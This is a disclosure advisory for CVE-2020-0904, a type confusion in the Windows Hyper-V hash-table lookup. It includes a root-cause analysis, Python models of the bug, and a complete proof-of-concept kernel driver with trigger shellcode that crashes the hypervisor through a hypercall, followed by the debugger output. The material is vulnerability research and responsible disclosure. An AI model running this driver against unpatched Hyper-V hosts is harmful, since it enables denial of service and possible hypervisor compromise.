Microsoft Hyper-V Type Confusion leading to Arbitrary Memory Dereference

A bug in the Hyper-V (hvix64) hash-table implementation allows an attacker to make the hypervisor dereference memory near (or belonging to) the hash-table struct object.

Posted on Sep 10, 2020 | Author: Daniel Fernandez Kuehr

Vendor	Microsoft, www.microsoft.com
Affected Products	Windows Hyper-V
Affected Versions	Windows 10 and Windows Server without KB4577032 updates
CVE ID	CVE-2020-0904
Severity	Important
Author	Daniel Fernandez Kuehr (@ergot86), Blue Frost Security GmbH

I. Platform

Microsoft Windows Version 10.0.18363.418
Microsoft Hypervisor Kernel Version 18362 x64

Earlier versions are also affected.

II. Technical Details

Hyper-V has a hash-table implementation used by a few hypervisor components. Objects are linked together by embedding an `entry` field in their struct definition, similar to how `LIST_ENTRY` is used for linked lists.

The entry layout can be defined as:

struct entry
{
  struct entry *next;
  unsigned long key;
};

The hash-table object contains a special `entry` field whose key is initialized to -1. This entry works as an end iterator when walking the table. If an attacker searches for the key value -1, a flaw in the lookup function reports the search as successful and returns this `termination entry`. The caller then uses it as if it were a valid iterator pointing to one of the elements of the table.

The hash-table object structure contains (but is not limited to) the following fields:

number of buckets
number of elements
array of pointers to buckets (up to 30)
a termination `entry` with `key=-1` and `next=NULL`
a pointer to the head of the list (initialized to the termination entry)

The relevant fields here are the `termination entry` embedded in the hash-table structure and the head of the list that will contain all table elements. The list head is initialized to point to the `termination entry`.

All elements are linked together, sorted by key in ascending order. Buckets are used as a means to index into sections of the list in constant time, which speeds up lookups.

When an element is inserted (or when a key lookup is performed), the original key is transformed in the following way:

key = reverse_bits64(key) | 1

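After the reversal, the most significant bit (MSb) of the original key ends up in the least significant position, where it is overwritten by the OR. The MSb is therefore lost, and every key `k` collides with `k' = k ^ (1 << 63)`. This could lead to security issues if the original key isn't explicitly compared. Some (theoretical) scenarios are: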

A check on key `k` denies access to some object, but the same object can be retrieved with key `k'`, which passes the check.
An element stored under `k` could be removed from the table by using `k'`.
An object could be inserted under `k'` beforehand to force a later insertion of `k` to fail.

None of these potential issues has been found so far, but they should be considered when making use of such implementations.
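The collision described above can be reproduced with a small Python model. This is only a sketch of the arithmetic: `reverse_bits64` and `transform_key` are illustrative names mirroring the formula above, not symbols taken from the hypervisor binary.

```python
MASK64 = (1 << 64) - 1


def reverse_bits64(value: int) -> int:
    """Reverse the bit order of a 64-bit unsigned integer."""
    value &= MASK64
    return int(format(value, "064b")[::-1], 2)


def transform_key(key: int) -> int:
    """Model of the transformation applied to element keys."""
    return reverse_bits64(key) | 1


k = 0x1234
k_prime = k ^ (1 << 63)  # differs from k only in the most significant bit

# Two distinct original keys end up with the same internal key.
assert k != k_prime
assert transform_key(k) == transform_key(k_prime)
print(hex(k), hex(k_prime), "->", hex(transform_key(k)))
```

Any code that relies on the transformed key alone cannot tell `k` and `k'` apart, which is why the original key would need to be compared explicitly.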

Buckets have their own list elements with special keys, which are distributed in the following way (Python representation):

>>> def keys(bucket_count):
...   return [list(range((1 << x) & ~1, (1 << (x+1)) & ~1))
...          for x in range(0, bucket_count)]

So for example if we have just 4 buckets, the produced keys are:

>>> keys(4)
[[0, 1], [2, 3], [4, 5, 6, 7], [8, 9, 10, 11, 12, 13, 14, 15]]

These keys are also bit-reversed but not ORed with 1, ensuring that they can't be matched against normal element keys when performing lookups.
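The separation between bucket keys and element keys can be checked with a short sketch. It assumes only what is stated above: bucket keys are bit-reversed without the OR, element keys are bit-reversed and ORed with 1. The helper names are illustrative.

```python
MASK64 = (1 << 64) - 1


def reverse_bits64(value: int) -> int:
    """Reverse the bit order of a 64-bit unsigned integer."""
    value &= MASK64
    return int(format(value, "064b")[::-1], 2)


def bucket_keys(bucket_count: int):
    """Same distribution as the keys() snippet in the text."""
    return [list(range((1 << x) & ~1, (1 << (x + 1)) & ~1))
            for x in range(bucket_count)]


def bucket_list_key(raw: int) -> int:
    """Bucket entries: bit-reversed, NOT ORed with 1."""
    return reverse_bits64(raw)


def element_list_key(raw: int) -> int:
    """Regular elements: bit-reversed and ORed with 1."""
    return reverse_bits64(raw) | 1


bucket_side = {bucket_list_key(raw) for keys in bucket_keys(4) for raw in keys}
element_side = {element_list_key(raw) for raw in range(1024)}

# Bucket keys are always even, element keys always odd, so they never match.
assert all(key & 1 == 0 for key in bucket_side)
assert all(key & 1 == 1 for key in element_side)
assert bucket_side.isdisjoint(element_side)
```

The termination entry is the exception: its key of -1 has the low bit set, so it lives in the same key space as regular elements.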

Finally, there is the traversal function. It is called once the lookup has been placed in a section of the list (indexed by bucket). From that point on, elements must be iterated to find the matching key.

bool __fastcall fun_traversal(struct entry *list_head, unsigned __int64 key,
 volatile signed __int64 **pPrevious, volatile signed __int64 **pCurrent)
{
  struct entry *head; // rbx
  struct entry *previous; // r10
  struct entry *current; // rax
  struct entry *_next; // rcx
  struct entry *next; // rcx

  head = list_head;
LABEL_2:
  previous = head;
  for ( current = (head->next & 0xFFFFFFFFFFFFFFFEui64); ; current = next )
  {
    _next = current->next;
    *pPrevious = previous;
    *pCurrent = current;
    if ( !(_next & 1) )
      break;
    next = (_next & 0xFFFFFFFFFFFFFFFEui64);
    if ( current != _InterlockedCompareExchange(previous, next, current) )
      goto LABEL_2;
LABEL_7:
    ;
  }
  if ( *&current->key < key )
  {
    previous = current;
    next = (_next & 0xFFFFFFFFFFFFFFFEui64);
    goto LABEL_7;
  }
  return *&current->key == key;
}

The function iterates over the given list starting at `head` until it finds a key greater than or equal to the function's `key` argument. The `pPrevious` and `pCurrent` arguments receive the addresses of the entry preceding the one where the walk stopped and of that entry itself. If the key was found the function returns `true`, otherwise `false`.

Code performing lookups expects the traversal function to return `false` if a key wasn't found. However, this is not the case if we search for the `termination entry` key (-1). Since all bits in the termination key are set to 1, the `OR 1` constraint doesn't protect it and the function will return `true` with `pCurrent` set to the termination entry pointer.

Just searching for the key `0xffffffffffffffff` is enough for this to happen. The colliding key `0x7fffffffffffffff` also produces the same behavior.
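The behavior can be reproduced with a simplified Python model of the traversal. This is a sketch under stated assumptions: it ignores the low "marked" bit of `next` and the compare-exchange unlinking seen in the decompiled code, and the `Entry`, `build_table` and `traverse` names are illustrative rather than taken from the hypervisor.

```python
from dataclasses import dataclass
from typing import Optional

MASK64 = (1 << 64) - 1
TERMINATION_KEY = MASK64  # -1 as an unsigned 64-bit value


@dataclass(eq=False)
class Entry:
    key: int
    next: Optional["Entry"] = None


def transform_key(key: int) -> int:
    """reverse_bits64(key) | 1, as described in the text."""
    return int(format(key & MASK64, "064b")[::-1], 2) | 1


def traverse(head: Entry, key: int):
    """Walk until an entry with key >= `key`; report whether it matches."""
    previous, current = head, head.next
    while current.key < key:
        previous, current = current, current.next
    return current.key == key, previous, current


def build_table(raw_keys):
    """Sorted list: bucket-like head, then elements, then termination entry."""
    termination = Entry(TERMINATION_KEY)
    head = Entry(0, termination)  # stand-in for a bucket entry (even key)
    for raw in raw_keys:
        node = Entry(transform_key(raw))
        _, previous, current = traverse(head, node.key)
        node.next, previous.next = current, node
    return head, termination


head, termination = build_table([1, 2, 3])

# A key that was never inserted is correctly reported as missing.
assert traverse(head, transform_key(4))[0] is False

# Both colliding keys "find" the termination entry instead.
for raw in (0xFFFFFFFFFFFFFFFF, 0x7FFFFFFFFFFFFFFF):
    found, _, current = traverse(head, transform_key(raw))
    assert found and current is termination
```

In this model the walk always stops at the termination entry at the latest, because no 64-bit key is greater than its key. The final equality test is what turns that stop into a false positive.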

As explained earlier, the returned entry is similar to a `LIST_ENTRY` field, so the base address of the linked object is calculated by subtracting the field offset:

resulting_base = CONTAINING_RECORD(returned_entry, struct obj_type, entry_field)

Instead of the address of the entry embedded in the expected object, the lookup returns the `termination entry` address, and applying `CONTAINING_RECORD` to it yields an arbitrary address inside (or below) the hash-table object. The caller will then operate on this arbitrary pointer believing it points to an object of its own type.
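The base calculation is plain pointer arithmetic, which the following sketch illustrates. All addresses and offsets here are hypothetical values chosen for illustration only; the real layout is not given in this advisory and varies between callers and builds.

```python
def containing_record(field_address: int, field_offset: int) -> int:
    """Arithmetic performed by CONTAINING_RECORD: field address minus offset."""
    return field_address - field_offset


# Hypothetical layout, for illustration only.
TABLE_BASE = 0xFFFFE80000001000      # address of the hash-table object
TERMINATION_ENTRY_OFFSET = 0x100     # offset of the termination entry in it
termination_entry = TABLE_BASE + TERMINATION_ENTRY_OFFSET

# Caller whose entry field sits at a small offset: the bogus "object"
# starts somewhere inside the hash-table object.
inside = containing_record(termination_entry, 0x40)
assert TABLE_BASE <= inside < termination_entry

# Caller whose entry field sits at a larger offset: the bogus "object"
# starts below the hash-table object, in whatever memory precedes it.
below = containing_record(termination_entry, 0x180)
assert below < TABLE_BASE

print(hex(inside), hex(below))
```

Which of the two cases applies depends on the caller's entry field offset, which is why the impact differs between callers.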

III. Impact

The impact of this vulnerability depends on conditions that affect the resulting offset. In the worst case it could potentially lead to arbitrary code execution.

Some of those conditions are:

Caller's object size and entry field offset.
Struct layout differences between releases/platforms.

IV. Proof of Concept

The following PoC triggers the vulnerability through what we believe is the simplest path, by making use of the `HvFlushGuestPhysicalAddressSpace` hypercall.

The driver has to be loaded in a Windows guest with nested virtualization enabled and Hyper-V disabled.

On the host:

Set-VMProcessor -VMName poc_vm -ExposeVirtualizationExtensions $true

On the guest (reboot needed):

bcdedit /set hypervisorlaunchtype off

#include <intrin.h>
#include <ntddk.h>
#include <wdf.h>
#include <initguid.h>

EXTERN_C_START
DRIVER_INITIALIZE DriverEntry;
EXTERN_C_END

#ifdef ALLOC_PRAGMA
#pragma alloc_text (INIT, DriverEntry)
#endif

#pragma code_seg(push, r1, ".text")
__declspec(allocate(".text")) BYTE trigger[] =
{
    0x48, 0x89, 0xC8,             //  mov rax, rcx                 ; hypercall page
    0xB9, 0xAF, 0x00, 0x01, 0x00, //  mov ecx, 0x100af             ; HvFlushGuestPhysicalAddressSpace
    0x48, 0xBA, 0xFF, 0xFF, 0xFF, //  mov rdx, 0x7fffffffffffffff  ; GPA
    0xFF, 0xFF, 0xFF, 0xFF, 0x7F, //    (rest of the 64-bit immediate)
    0x4D, 0x31, 0xC0,             //  xor r8, r8                   ; flags
    0xFF, 0xD0                    //  call rax
};
#pragma code_seg(pop, r1)

typedef void(* TriggerCall)(void *hc_page);

typedef union hv_x64_msr_contents
{
    UINT64 as_uint64;
    struct
    {
        UINT64 enable : 1;
        UINT64 reserved : 11;
        UINT64 guest_physical_address : 52;
    } u;
} hv_msr_contents;

#define HV_X64_MSR_GUEST_OS_ID      0x40000000
#define HV_X64_MSR_HYPERCALL        0x40000001
#define HV_X64_MSR_VP_ASSIST_PAGE   0x40000073
#define CR4_VMXE                    (1 << 13)
#define CPUID_FEAT_ECX_VMX          (1 << 5)
#define MSR_IA32_VMX_BASIC          0x480

__declspec(align(0x1000)) UINT32 vmxon_page[1024];
__declspec(align(0x1000)) UINT32 assist_page[1024];


NTSTATUS enable_vmxe(void)
{
    int cpuInfo[4];
    NTSTATUS status = STATUS_NOT_IMPLEMENTED;
 
    __cpuid(cpuInfo, 1);

    if (cpuInfo[2] & CPUID_FEAT_ECX_VMX)
    {
        UINT64 cr4 = __readcr4();
        UINT64 pvmxon_page = MmGetPhysicalAddress(&vmxon_page).QuadPart;

        KdPrint(("[+] Virtualization support detected"));

        if (!(cr4 & CR4_VMXE))
        {
            KdPrint(("[+] Enabling VMXE..."));
            __writecr4(cr4 | CR4_VMXE);
        }

        memset(vmxon_page, 0, sizeof(vmxon_page));
        vmxon_page[0] = (UINT32) __readmsr(MSR_IA32_VMX_BASIC);
        KdPrint(("[+] VMX revision %x", vmxon_page[0]));
        KdPrint(("[+] Entering monitor mode..."));

        if (__vmx_on(&pvmxon_page))
            KdPrint(("[-] VMXON failed"));
        else
            status = STATUS_SUCCESS;
    }

    return status;
}


NTSTATUS
DriverEntry(
    _In_ PDRIVER_OBJECT  DriverObject,
    _In_ PUNICODE_STRING RegistryPath
    )
{
    void* hypercall_page;
    hv_msr_contents hc_page, assist;
    PHYSICAL_ADDRESS pa_hcpage;
    NTSTATUS status = enable_vmxe();

    if (!NT_SUCCESS(status))
        return status;

    hc_page.as_uint64 = __readmsr(HV_X64_MSR_HYPERCALL);
    pa_hcpage.QuadPart = hc_page.u.guest_physical_address << PAGE_SHIFT;
    hypercall_page = MmMapIoSpace(pa_hcpage, PAGE_SIZE, MmNonCached);
    memset(&assist_page, 0, sizeof(assist_page));
    assist.as_uint64 = MmGetPhysicalAddress(&assist_page).QuadPart;
    assist.u.enable = 1;
    __writemsr(HV_X64_MSR_VP_ASSIST_PAGE, assist.as_uint64);
    ((TriggerCall)trigger)(hypercall_page); // Boom
    return status;
}
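For readers unfamiliar with the constants used by the driver, the following Python sketch decodes them. It assumes the hypercall input value layout from the Hyper-V Top-Level Functional Specification (call code in bits 15:0, fast-call flag in bit 16) and the MSR layout given by the `hv_x64_msr_contents` union above. The function names and the sample MSR value are hypothetical.

```python
PAGE_SHIFT = 12


def decode_hypercall_input(value: int) -> dict:
    """Split a hypercall input value into call code and fast-call flag."""
    return {
        "call_code": value & 0xFFFF,          # bits 15:0
        "fast": bool(value & (1 << 16)),      # bit 16: register-based call
    }


def decode_hypercall_msr(value: int) -> dict:
    """Mirror of the hv_x64_msr_contents union: enable bit plus page number."""
    return {
        "enable": bool(value & 1),                         # bit 0
        "physical_address": (value >> 12) << PAGE_SHIFT,   # bits 63:12
    }


# 0x100af as loaded into ecx by the trigger stub.
print(decode_hypercall_input(0x100AF))

# Hypothetical MSR value, only to show the arithmetic used in DriverEntry.
print(decode_hypercall_msr(0x12345001))
```

With the fast-call flag set, the parameters travel in registers, which is why the stub places the GPA in `rdx` and the flags in `r8` instead of passing a pointer to an input page.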

In this PoC the base calculation yields the address of the field holding the number of buckets in the hash-table object. The first field of the object the caller expects is a pointer, which is passed to the next function. That function receives 0x10 (the number of buckets) instead and dereferences it, crashing the system.

Access violation - code c0000005 (!!! second chance !!!)
hv+0x30548c:
fffffbf3`a090548c 488b01          mov     rax,qword ptr [rcx]
3: kd> r rcx
rcx=0000000000000010
3: kd> kb
 # RetAddr           : Args to Child                                                           : Call Site
00 fffffbf3`a0904cce : ffffe802`c5604190 ffffe802`c56048c0 00000000`00000003 ffffe802`c5608050 : hv+0x30548c
01 fffffbf3`a09026f3 : ffffe802`c5604050 fffffbf3`a1201068 00000000`00000001 fffffbf3`a090f7e9 : hv+0x304cce
02 fffffbf3`a08b6363 : 00000000`00000010 ffff9d86`d2a8f7b8 00000000`00000000 00000000`00000000 : hv+0x3026f3
03 fffffbf3`a0829068 : 00000000`00000000 00000000`00000002 00000000`00000000 fffffbf3`a082ea1e : hv+0x2b6363
04 fffffbf3`a0828cf2 : 00000000`00000000 fffffbf3`a08255c1 ffffe802`c5608050 fffffbf3`a081d842 : hv+0x229068
05 fffffbf3`a081e1de : 00000000`00000000 00000000`0010003a 00000000`0010003a 00000000`000100af : hv+0x228cf2
06 fffffbf3`a08734f6 : 00000000`00000000 ffffe802`c5608000 00000000`800000ff 00000000`00000001 : hv+0x21e1de
07 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : hv+0x2734f6

V. Disclosure Timeline

2020-06-02	Bug report sent to secure@microsoft.com
2020-07-21	Microsoft confirms the bounty award of 15,000 USD.
2020-09-08	Microsoft releases the patch.

Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact research@bluefrostsecurity.de for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall Blue Frost Security be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Blue Frost Security has been advised of the possibility of such damages.